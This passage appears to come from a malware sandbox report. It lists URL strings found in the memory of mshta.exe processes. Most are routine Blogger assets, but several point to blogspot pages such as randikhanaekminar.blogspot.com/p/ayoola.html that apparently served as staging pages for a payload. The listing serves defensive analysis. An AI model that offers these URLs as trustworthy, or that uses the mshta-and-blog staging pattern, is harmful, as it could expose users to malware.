Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/js/cookienotice.js
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/js/cookienotice.jsCB_1
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/js/cookienotice.jsKB_1
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/js/cookienotice.jsSB_1
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/2C_1
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/8C_1
Source: mshta.exe, 00000010.00000003.455960614.00000000054B1000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/ayoola.html
Source: mshta.exe, 00000010.00000003.456830185.000000000543E000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.b
Source: mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/ayoola.htmlse
Source: mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/ayoola.htmlwidgets.jsotrack.js
Source: mshta.exe, 00000010.00000002.509537161.00000000053BF000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/p/l&type=blo
Source: mshta.exe, 00000010.00000002.498024621.0000000003CE0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.455960614.00000000054B1000.00000004.00000001.sdmp String found in binary or memory: https://randikhanaekminar.blogspot.com/search
Source: mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/:
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.490488368.0000000005423000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
Source: mshta.exe, 00000005.00000003.488872018.00000000054F6000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.618179657.0000000004BBC000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577881485.0000000002CD0000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)n
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png.NET4.0E)
Source: mshta.exe, 00000005.00000003.495339977.00000000004A9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;
Source: mshta.exe, 00000005.00000003.618251685.0000000002D04000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngYi
Source: mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
Source: mshta.exe, 00000005.00000003.577881485.0000000002CD0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.644746898.0000000004B80000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
Source: mshta.exe, 00000005.00000002.636101223.0000000002C34000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png0
Source: mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png8
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngIE_1
Source: mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngPFA
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngSE_1
Source: mshta.exe, 00000005.00000002.645024735.0000000004BE7000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngj
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.637002174.0000000002C91000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif0
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gifogID=8965474558532949541&zx=9facc617-3779-4
Source: mshta.exe, 00000005.00000003.489772710.00000000054EA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.636101223.0000000002C34000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.458901037.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
Source: mshta.exe, 00000005.00000002.637002174.0000000002C91000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif.
Source: mshta.exe, 00000005.00000002.637002174.0000000002C91000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
Source: mshta.exe, 00000005.00000003.488707594.00000000054F1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.581772247.00000000054F2000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif)#O
Source: mshta.exe, 00000005.00000002.637002174.0000000002C91000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif6
Source: mshta.exe, 00000005.00000003.491720774.00000000090F5000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 00000005.00000003.495624663.0000000004C05000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577881485.0000000002CD0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582695798.0000000005351000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000005.00000002.637002174.0000000002C91000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png&
Source: mshta.exe, 00000005.00000002.636101223.0000000002C34000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.599479425.0000000003301000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.458901037.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 00000005.00000003.600223576.0000000002DAA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp, mshta.exe, 00000005.00000002.637002174.0000000002C91000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495339977.00000000004A9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 00000005.00000003.598456528.00000000052BF000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.636101223.0000000002C34000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.458901037.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/n:no
Source: mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/nt-s
Source: mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/xcol
Source: mshta.exe, 00000010.00000002.509775441.00000000053D7000.00000004.00000001.sdmp String found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000005.00000003.617367342.0000000002C3D000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000005.00000003.610468639.00000000002CB000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html
Source: mshta.exe, 00000005.00000003.577564882.0000000004D1C000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.475726679.0000000005366000.00000004.00000001.sdmp String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: mshta.exe, 00000005.00000003.475726679.0000000005366000.00000004.00000001.sdmp String found in binary or memory: https://stats.g.doubleclick.net/j/collecthttps://www.google.com/ads/ga-audienceshttps://www.google.%
Source: mshta.exe, 00000005.00000003.577564882.0000000004D1C000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.475726679.0000000005366000.00000004.00000001.sdmp String found in binary or memory: https://tagassistant.google.com/
Source: mshta.exe, 00000005.00000003.491720774.00000000090F5000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/intent/tweet?text=
Source: mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://www.blo.com
Source: mshta.exe, 00000010.00000003.458901037.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://www.blo.comp
Source: mshta.exe, 00000010.00000002.509775441.00000000053D7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000010.00000003.455960614.00000000054B1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.490317514.0000000003CC5000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000005.00000003.491375552.000000000906A000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.645614955.0000000004C33000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.645068218.0000000004BEA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/U
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g&ec=GAZAHg
Source: mshta.exe, 00000005.00000003.618251685.0000000002D04000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g&ec=GAZAHgmlx
Source: mshta.exe, 00000005.00000003.478144848.0000000005373000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.580010849.0000000002DAD000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.593139507.0000000005375000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/
Source: mshta.exe, 00000010.00000003.490317514.0000000003CC5000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%
Source: mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.617367342.0000000002C3D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.490488368.0000000005423000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoo
Source: mshta.exe, 00000005.00000003.618179657.0000000004BBC000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577813456.0000000004BE6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/
Source: mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&ty
Source: mshta.exe, 00000005.00000002.645491196.0000000004C1E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.ggspotURL=https%3A%2F%2Fjohonathahogyaabarhomeintum.blogspot.com%2Fp%
Source: mshta.exe, 00000010.00000003.456255667.000000000544A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=4778963473423104316&pageID=6952515847710360840
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=3337584593152806955
Source: mshta.exe, 00000005.00000002.637239484.0000000002CC1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=3337584593152806955:
Source: mshta.exe, 00000005.00000003.493458774.0000000004C2A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=3337584593152806955ot)
Source: mshta.exe, 00000005.00000002.637239484.0000000002CC1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=3337584593152806955t)
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/content.g
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/content.gp9
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/der
Source: mshta.exe, 00000005.00000003.577813456.0000000004BE6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3
Source: mshta.exe, 00000005.00000002.626390209.000000000041E000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-
Source: mshta.exe, 00000010.00000003.455960614.00000000054B1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.490317514.0000000003CC5000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/4778963473423104316/posts/default
Source: mshta.exe, 00000005.00000003.610322006.00000000081AF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/8965474558532949541/
Source: mshta.exe, 00000005.00000003.456783497.00000000031BE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.487509201.0000000005A25000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.575813653.0000000004CA9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.576052142.0000000009031000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/8965474558532949541/posts/default
Source: mshta.exe, 00000005.00000003.616872590.0000000004BB3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.465572103.00000000036D4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/adspersonalization
Source: mshta.exe, 00000005.00000003.493458774.0000000004C2A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498024621.0000000003CE0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/blogspot-cookies
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzzss
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.617367342.0000000002C3D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy/products?tab=jh
Source: mshta.exe, 00000005.00000002.638410901.0000000003C6A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicylogspot.com/p/ayoolaayoola.html?interstitial=ABqL8_jjYAm15x5
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapi
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapiC9
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.575813653.0000000004CA9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforum
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforum69
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumN9
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumu9
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discuss
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discussW9
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discussl9
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter
Source: mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter-2.0:
Source: mshta.exe, 00000005.00000003.617367342.0000000002C3D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcentera
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.617367342.0000000002C3D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacyI9
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/terms
Source: mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/termser
Source: mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/termsum(9
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.575813653.0000000004CA9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.617367342.0000000002C3D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorials
Source: mshta.exe, 00000005.00000003.617367342.0000000002C3D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorialsX
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.png
Source: mshta.exe, 00000005.00000003.569852270.000000000540B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.png1
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngI
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngOUuht.eott
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngort.heig
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngpost_iframe.jstml...
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.623456427.00000000001DC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngM-
Source: mshta.exe, 00000005.00000003.570623307.00000000053F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngQ
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngQ-
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngX-
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png_-
Source: mshta.exe, 00000005.00000003.575968678.0000000004CCD000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngn
Source: mshta.exe, 00000005.00000003.495624663.0000000004C05000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.645213085.0000000004C05000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngs
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp, mshta.exe, 00000005.00000003.492266063.0000000004C8B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/page-edit.g?blogID=8965474558532949541&pageID=3337584593152806955&from=penci
Source: mshta.exe, 00000005.00000003.612322020.00000000002F2000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.483536509.00000000054E0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.456255667.000000000544A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/rpc_relay.html
Source: mshta.exe, 00000010.00000003.456255667.000000000544A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=4778963473423104316&pageID=6952515847710360840&target=pi
Source: mshta.exe, 00000005.00000003.492266063.0000000004C8B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=bl
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp, mshta.exe, 00000005.00000003.492266063.0000000004C8B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=em
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=fa
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=pi
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.491912113.0000000004D7E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.492266063.0000000004C8B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=tw
Source: mshta.exe, 00000005.00000003.610322006.00000000081AF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbi
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.580010849.0000000002DAD000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp, mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.618831958.0000000004C63000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.636101223.0000000002C34000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.456255667.000000000544A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.js
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jsAAAAAAAAA
Source: mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jsEC:
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jsU
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jsdAAAAIC
Source: mshta.exe, 00000005.00000002.636101223.0000000002C34000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jsp
